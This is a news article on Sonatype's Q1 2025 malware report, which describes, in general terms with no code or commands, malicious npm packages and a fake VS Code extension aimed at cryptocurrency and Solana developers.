Malware inside the code: Crypto apps at risk
Fake and hijacked open-source tools are putting developers – and user funds – in danger
Cybersecurity firm Sonatype uncovered nearly 18,000 malicious open-source software packages in the first three months of 2025, with many designed to steal sensitive data or hijack systems – and a growing number aimed at cryptocurrency developers.
The figure, released in Sonatype’s latest quarterly malware report, marks a significant drop from the 34,000 packages detected at the end of 2024. But researchers warn that while the total number is lower, the malware is getting smarter and more dangerous.
Over half of the malicious packages detected in Q1 were built for data exfiltration – up from just 26% in the previous quarter. This type of malware is designed to steal passwords, access keys, and other sensitive information from infected machines.
Malware for crypto mining, which secretly uses victims’ devices to generate digital currency, also doubled from 3.5% to 7%.
Repackaged crypto tools quietly steal credentials
One of the most alarming findings involved npm packages used in crypto and blockchain development. Hackers took control of trusted tools and republished them with hidden malware.
The packages still worked as expected, which helped them avoid detection. But they quietly stole data from anyone who installed them — including user profiles, system details, and environment variables. Sonatype believes a single threat actor was behind the attack, though no group was named.
Another case involved a fake Visual Studio Code extension, disguised as a useful developer tool but embedded with a modified remote access program. Once installed, it gave attackers full control over the machine, allowing them to monitor screens and steal files – all without the user’s knowledge.
Fake Solana tools act like spyware
A third campaign specifically targeted Solana developers. Malicious npm packages claiming to support Solana were downloaded nearly 2,000 times. Once installed, they ran scripts that logged keystrokes, captured screenshots, and sent the data to external servers using Slack and ImgBB.
In this case, the malicious code wasn’t hidden, which suggests the attackers didn’t expect anyone to notice it.
The report noted that this type of malware often runs as soon as a package is loaded, bypassing many traditional security tools. Sonatype recommends real-time malware detection during development and increased scrutiny of open source packages, especially in financial or crypto-related projects.
Since 2019, the company says its Repository Firewall has blocked more than 100,000 malicious packages before they reached development environments.
As attackers shift their focus from users and platforms to the tools developers rely on, the risk is no longer just bad code — it’s trusted code doing harmful things.
